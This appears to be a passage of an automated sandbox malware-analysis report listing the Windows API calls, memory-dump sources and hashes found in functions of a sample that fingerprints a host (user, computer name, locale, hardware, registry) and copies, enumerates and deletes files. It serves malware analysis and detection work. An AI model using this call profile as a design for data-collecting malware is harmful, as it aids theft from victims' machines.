                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE2129717412096FDB14AB24CD89BAE77B9EB4A701F90013AF903A7B80DF306E0087A1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 004129BA
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041D888), ref: 004129D7
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04403630), ref: 004129EB
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041D88C), ref: 004129FD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: FindFirstFileA.KERNELBASE(?,?), ref: 004125A0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                                                                                                                                                                                                                        • String ID: L0A
                                                                                                                                                                                                                                                                                        • API String ID: 2667927680-1482484291
                                                                                                                                                                                                                                                                                        • Opcode ID: f3e6bd076d21e16df55fd7eb472b4ad65ac1318d51bf9674c6e2c7c7c76ac990
                                                                                                                                                                                                                                                                                        • Instruction ID: f34e92357168eddbedcb052ffd5f2c6281475bb6170069d81cff4dd89e8051f4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f3e6bd076d21e16df55fd7eb472b4ad65ac1318d51bf9674c6e2c7c7c76ac990
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A621CCBA9005087BC724FBA0DD46EDA373E9B54745F00058AB64956081EE7867C48BD5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3466090806-0
                                                                                                                                                                                                                                                                                        • Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                                                                                                                                                                                                        • Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0041475B
                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,043EC9E0,00000000,00020119,00000000), ref: 0041477B
                                                                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,04406E98,00000000,00000000,000000FF,000000FF), ref: 0041479C
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 004147A6
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3466090806-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
                                                                                                                                                                                                                                                                                        • Instruction ID: 520453153fef2218f7e1f18e9bcc50e310f062f1fe861ea372c3465721436b4a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62013C79A40608FFDB20DBE4ED49FAEB779EB88700F108159FA05A6290DB705A018F90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,043EC7E8,00000000,00020119,00000000), ref: 0041433B
                                                                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,04406490,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3466090806-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
                                                                                                                                                                                                                                                                                        • Instruction ID: 8a55c6bb4586fa39bc5dd89715e436abefd5940c4b9bd8db073c1251d6bd8ac1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3014FB5A40608BFDB20DBE4ED49FAEB77DEB88701F005154FA05E7290DB70AA01CB90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetEnvironmentVariableA.KERNEL32(04403850,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 0040998D
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(04406DD8,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 00409A16
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04402B50,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                        • SetEnvironmentVariableA.KERNEL32(04403850,00000000,00000000,?,0041DA4C,?,0040EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041D6EF), ref: 00409A02
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00409982, 00409996, 004099AC
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                                                                                        • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                                                                                                                        • API String ID: 2929475105-4027016359
                                                                                                                                                                                                                                                                                        • Opcode ID: 8ade76cb7972d7545d1cdae6b8c2efec5127d19485faea56a3866a558087ec3a
                                                                                                                                                                                                                                                                                        • Instruction ID: 6647cd3c00128b620a4a232c7fbe97fce3d03bd073b05a107f0d1bf2b4fd60a8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ade76cb7972d7545d1cdae6b8c2efec5127d19485faea56a3866a558087ec3a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 134196B5900A009BDB24DFA4FD85AAE37B6BB44305F01512EF405A72E2DFB89D46CF54
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                        • String ID: :h@$:h@$@:h@
                                                                                                                                                                                                                                                                                        • API String ID: 544645111-3492212131
                                                                                                                                                                                                                                                                                        • Opcode ID: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                                                                                                                                                                                                        • Instruction ID: 05c83ec730d02739dc9afbe7597ff905435882b08ae1c12394b3aafa6fe5c026
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 272131B4A00208EFDB04CF85C544BAEBBB1FF48304F1185AAD406AB381D3399A91DF85
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04407710,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040D0DF
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040D0F3
                                                                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040D16C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 211194620-0
                                                                                                                                                                                                                                                                                        • Opcode ID: cd629de8ee10eada1f72c85526e9c289853b14595428188ec74a26340a2c39ec
                                                                                                                                                                                                                                                                                        • Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd629de8ee10eada1f72c85526e9c289853b14595428188ec74a26340a2c39ec
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                          • Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                                                                                                                                                                                                          • Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                                                                                                                                                                                                          • Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                                                                                                                                                                                                          • Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,043EC7E8,00000000,00020119,00000000), ref: 0041433B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,04406490,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,04406D78,00000000,?,0041D74C,00000000,?,00000000,00000000,?,044035C0), ref: 0041438F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,04406D78,00000000,?,0041D74C,00000000,?,00000000,00000000,?,044035C0), ref: 00414396
                                                                                                                                                                                                                                                                                          • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,044037A0,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                                                                          • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                                                                          • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0
                                                                                                                                                                                                                                                                                          • Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,044062E0,00000000,?,0041D758,00000000,?,00000000,00000000,?,04406E58,00000000), ref: 004144C0
                                                                                                                                                                                                                                                                                          • Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                                                                                                                                                                                                          • Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,044062E0,00000000,?,0041D758,00000000,?,00000000,00000000,?,04406E58,00000000), ref: 00414542
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A
                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(00000000,?,04406C58,00000000,?,0041D76C,00000000,?,00000000,00000000,?,04406550,00000000,?,0041D768,00000000), ref: 0041037E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,043EC9E0,00000000,00020119,00000000), ref: 0041477B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,04406E98,00000000,00000000,000000FF,000000FF), ref: 0041479C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855
                                                                                                                                                                                                                                                                                          • Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
                                                                                                                                                                                                                                                                                          • Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,04406340,00000000,?,0041D774,00000000,?,00000000,00000000,?,044062B0), ref: 0041496D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,043EC0B8,00000000,00020019,00000000,0041D289), ref: 00414B41
